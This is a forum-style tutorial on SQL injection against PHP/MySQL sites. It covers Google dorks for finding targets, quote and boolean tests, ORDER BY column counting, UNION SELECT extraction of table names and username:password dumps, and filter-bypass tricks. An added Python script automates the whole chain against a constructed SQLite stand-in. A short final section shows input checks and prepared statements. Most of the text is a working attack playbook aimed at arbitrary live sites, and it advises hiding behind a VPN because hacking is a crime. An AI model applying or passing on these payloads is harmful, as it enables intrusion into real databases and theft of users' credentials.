SQL Injection
1) What is SQL Injection?
SQL Injection is a type of web attack. The attacker abuses a script that pastes user input straight into a database query, and uses that to read data (or more) from the database. Vulnerable pages typically look like this:

Code
http://www.link.com/index.php?id=

The script name does not matter; index.php is just an example.
2) Finding vulnerable sites:
The easiest way to find candidate sites is Google. The dorks below are examples; if you have your own, go ahead and use them:

Code
inurl:faq.php?id=

inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are two ways to check whether a site is vulnerable.

1st way: we have the link
Code
http://site.com/book.php?id=141

and append a single quote ' to it, giving:
Code
http://site.com/book.php?id=141'

2nd way: we have the same link
Code
http://site.com/book.php?id=141

and append +and+1=2-- to it, giving:
Code
http://site.com/book.php?id=141+and+1=2--

If part of the page disappears (a picture, some text or similar) or an error such as "You have an error in your SQL syntax" appears, the site is vulnerable. The second test is more convincing when you also try +and+1=1--: a vulnerable page comes back normal for 1=1 and broken for 1=2, which rules out a page that simply rejects the longer parameter.
4) Finding the number of columns
We find it with ORDER BY. Starting from the link:

Code
http://site.com/book.php?id=141

we append +order+by+5--:
Code
http://site.com/book.php?id=141+order+by+5--

If the page opens normally, the query has at least 5 columns. Let's try 10.
Code
http://site.com/book.php?id=141+order+by+10--

Now part of the page disappears, so there are at least 5 and fewer than 10 columns. Let's try 7.
Code
http://site.com/book.php?id=141+order+by+7--

The page opens normally, so there are at least 7 and fewer than 10 columns. Let's try 8.
Code
http://site.com/book.php?id=141+order+by+8--

With 8 part of the page disappears, so the query has exactly 7 columns. ORDER BY n fails as soon as n exceeds the number of columns, so the largest n that still works is the column count; a binary search between 1 and some upper bound finds it in a handful of requests instead of guessing.
5) Finding vulnerable columns
The usable columns are found with UNION SELECT ALL. We negate the id (-141) so the original query matches no row and only our UNION row is rendered, and append +union+select+all+1,2,3,4,5,6,7-- (one number per column found in step 4):
Code
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

Some of the numbers appear on the page (in this case 1 2 3 4 5 6 7). Those are the columns whose content the page actually prints, and only those can be used to read data. We'll use the second column.
6) Finding the database version
As said, we read data through the second column. Instead of the number 2 we put version() or @@version:
Code
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

Where the 2 was, the page now shows the database version.
If the version is 4.x there is no information_schema, so table and column names have to be guessed; if it is 5.x or later, they can be read from information_schema directly.

Here we got 5.0.51a-24+lenny5, so we don't have to guess the table and column names.
7) Finding table names
If the database version is 4 you cannot list table and column names; you have to guess them. If it is 5 or later, skip the guessing and go to the information_schema query further down.
Names of some possible tables:

Code
admin

admins
user
users
member
members

Names of some possible columns:
Code
username

uname
un
user
name
nick
password
pw
pwd
passwd

If the version is 5 or later we can read the table names: instead of the number 2 we put group_concat(table_name), and after the last column number we add +from+information_schema.tables+where+table_schema=database()-- (database() is the schema the site is using, so this lists only its tables, not MySQL's own).
So we get this link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Where the 2 was, the page now lists the table names, in this case date, book, users. We'll take the columns from the users table.
8) Finding column names
We have the table we want and now we need its columns. Replace group_concat(table_name) with group_concat(column_name), and replace +from+information_schema.tables+where+table_schema=database()-- with +from+information_schema.columns+where+table_name=hex--, where hex is the table name encoded as a MySQL hex literal. Writing it as 0x... means the payload contains no quote characters, which matters when the site escapes quotes (addslashes / magic_quotes).
To get the hex, go to:
Code
http://www.string-functions.com/string-hex.aspx

and enter the table name (here users), which gives 7573657273. Now we can see the columns:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--

9) Taking data from the columns
We got: id, name, surname, username, password, level.
We only need username and password.

Replace group_concat(column_name) with group_concat(username,0x3a,password); 0x3a is the hex literal for ':' and separates the username from the password in the output. Replace +from+information_schema.columns+where+table_name=0x7573657273-- with +from+users--,
which gives the link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and the result, e.g.:
Code
sebrezovski:1533562

seratum:seratum
coach:53.21.1985.
biga:biga

which are the usernames and passwords from this site. Note that group_concat output is cut off at group_concat_max_len (1024 bytes by default), so on a large table you will only see the first part of the list.
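Steps 3 to 9 as one runnable script, added here as an example; it is not code from the original post. Python with an in-memory SQLite database stands in for the PHP/MySQL site: book_page() is a deliberately vulnerable book.php?id= that pastes the parameter into the query and prints only the title and author columns, and the functions after it automate the checks from the steps above against it (step 4 is done as a binary search rather than by hand). The tables, rows and credentials are constructed for the example, and the MySQL-specific pieces have SQLite stand-ins named in the comments (sqlite_version() for @@version, sqlite_master and pragma_table_info for information_schema, ||':'|| for 0x3a).

```python
import re
import sqlite3

# Constructed stand-in for the MySQL database behind book.php: SQLite so the
# script runs offline. Every table, row and credential below is invented.
con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE book(id INTEGER, title TEXT, author TEXT, year INTEGER,
                  isbn TEXT, pages INTEGER, price REAL);
INSERT INTO book VALUES (141, 'Some Book', 'A. Writer', 2001, '978-0', 320, 9.99);
CREATE TABLE users(id INTEGER, name TEXT, surname TEXT, username TEXT,
                   password TEXT, level INTEGER);
INSERT INTO users VALUES (1, 'Ann', 'Smith', 'ann', 'secret1', 1),
                         (2, 'Bob', 'Jones', 'bob', 'hunter2', 0);
""")

ERROR = "You have an error in your SQL syntax"

def book_page(id_param):
    """The vulnerable endpoint (book.php?id=): the parameter is pasted straight
    into the SQL text. Returns the HTML a visitor sees; of the 7 columns only
    title (column 2) and author (column 3) are printed."""
    try:
        rows = con.execute("SELECT * FROM book WHERE id=" + id_param).fetchall()
    except sqlite3.Error:
        return ERROR
    if not rows:
        return "<p>no such book</p>"
    return f"<h1>{rows[0][1]}</h1><p>{rows[0][2]}</p>"

def fields(html):
    # The values the page printed, in column order.
    return re.findall(r"<(?:h1|p)>(.*?)</(?:h1|p)>", html)

def is_vulnerable(page):
    """Step 3: a bare quote produces the SQL error, or AND 1=2 blanks the page
    while AND 1=1 leaves it intact."""
    quote_breaks = ERROR in page("141'")
    boolean_differs = "<h1>" in page("141 AND 1=1--") and "<h1>" not in page("141 AND 1=2--")
    return quote_breaks or boolean_differs

def find_column_count(page, upper=64):
    """Step 4 as a binary search: ORDER BY n works for every n up to the column
    count and errors beyond it, so the largest working n is the answer
    (assumes at least one column and at most `upper`)."""
    lo, hi = 1, upper
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ERROR in page(f"141 ORDER BY {mid}--"):
            hi = mid - 1
        else:
            lo = mid
    return lo

def find_visible_columns(page, ncols):
    """Step 5: id -141 matches nothing, so only the UNION row of marker numbers
    is rendered; the markers that appear are the columns the page displays."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"-141 UNION SELECT ALL {markers}--")
    return sorted(int(f) for f in fields(html) if f.isdigit() and 1 <= int(f) <= ncols)

def extract(page, expr, ncols, col, tail=""):
    """Steps 6-9: put an expression into one displayed column of the UNION row
    and read its value back out of the page."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[col - 1] = expr
    html = page(f"-141 UNION SELECT ALL {','.join(parts)} {tail}--")
    return next(f for f in fields(html) if f not in parts)

def mysql_hex(name):
    """Step 8: the 0x... literal the tutorial uses so the table name needs no quotes."""
    return "0x" + name.encode().hex()

def dump_site(page):
    ncols = find_column_count(page)               # 7 for the constructed table
    col = find_visible_columns(page, ncols)[0]    # first displayed column, 2
    # SQLite stand-ins for the MySQL expressions on the page: sqlite_version()
    # for @@version, sqlite_master for information_schema.tables,
    # pragma_table_info for information_schema.columns, ||':'|| for 0x3a.
    return {
        "version": extract(page, "sqlite_version()", ncols, col),
        "tables": extract(page, "group_concat(name)", ncols, col,
                          "FROM sqlite_master WHERE type='table'"),
        "columns": extract(page, "group_concat(name)", ncols, col,
                           "FROM pragma_table_info('users')"),
        "creds": extract(page, "group_concat(username||':'||password)", ncols, col,
                         "FROM users"),
    }

if __name__ == "__main__":
    print("vulnerable:", is_vulnerable(book_page))
    for key, value in dump_site(book_page).items():
        print(f"{key}: {value}")
```

Against a real MySQL target the expressions in dump_site() are swapped for the ones in the steps above (@@version, information_schema.tables with table_schema=database(), information_schema.columns with table_name=0x7573657273, and group_concat(username,0x3a,password)); everything else, including the binary search for the column count, stays the same.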
10) Filter bypassing
If union+select+all is blocked (the page answers "not accessible" or similar), a filter that matches the keywords case-sensitively is bypassed by mixing case: UnIoN+sElEcT+aLl.
On some sites spaces are stripped, so put + (a URL-encoded space) or an inline SQL comment /**/ in their place (/* opens and */ closes an SQL comment; it is not PHP syntax).
On some sites version() itself is filtered; unhex(hex(version())) returns the same string through function names the filter does not match.
Also note that MySQL only treats -- as a comment when it is followed by whitespace, so if a payload ending in -- fails, end it with --+ or -- - instead (or use # as the comment).

11) Protecting a site from SQL Injection
For a numeric id, reject anything that is not a number before it reaches the query:
Code
<?php
if (!isset($_GET['id']) || !is_numeric($_GET['id'])) {
    // Reached when someone appends ' or +and+1=2 to the id
    echo 'Invalid id';
    exit;
}
$id = (int) $_GET['id'];

This only works because the parameter is supposed to be a number. The general fix, for ids and text fields alike, is a prepared statement with bound parameters (PDO or mysqli), so the value is never part of the SQL text and cannot change the meaning of the query.
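The same protection as a small runnable example, added here and not code from the original post. Python with SQLite stands in for PHP/MySQL: lookup_unsafe() is the concatenation from book.php, lookup_checked() adds the numeric check above, and lookup_bound() uses a bound parameter so the id travels as data even when the check is skipped. The table and row are constructed for the example.

```python
import re
import sqlite3

# Constructed sample table standing in for the site's book table (not real data).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE book(id INTEGER, title TEXT)")
con.execute("INSERT INTO book VALUES (141, 'Some Book')")

def is_numeric_id(value):
    """The tutorial's is_numeric() check, tightened to plain ASCII digits:
    PHP's is_numeric() also accepts ' 141', '1e3' and '1.5', which are not
    injectable but are not ids either."""
    return isinstance(value, str) and re.fullmatch(r"[0-9]+", value) is not None

def lookup_unsafe(id_param):
    """Concatenation, the bug in book.php?id=: the parameter becomes SQL text."""
    return con.execute("SELECT title FROM book WHERE id=" + id_param).fetchall()

def lookup_checked(id_param):
    """The fix from the tutorial: refuse anything that is not a whole number
    (None plays the role of the PHP echo + exit), then cast before use."""
    if not is_numeric_id(id_param):
        return None
    return con.execute("SELECT title FROM book WHERE id=" + str(int(id_param))).fetchall()

def lookup_bound(id_param):
    """The general fix: a prepared statement with a bound parameter. The value
    is sent as data, so quotes, UNION and -- in it are just characters and the
    injection matches no row instead of rewriting the query."""
    return con.execute("SELECT title FROM book WHERE id=?", (id_param,)).fetchall()
```

Run the payloads from the steps above through all three: the concatenated query hands back whatever the UNION selects, the checked one refuses the request, and the bound one simply finds no book with that "id".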
Hope you enjoy :)
And to be safe, always use a VPN when you hack a website, because it is a crime; only test sites you have permission to test.
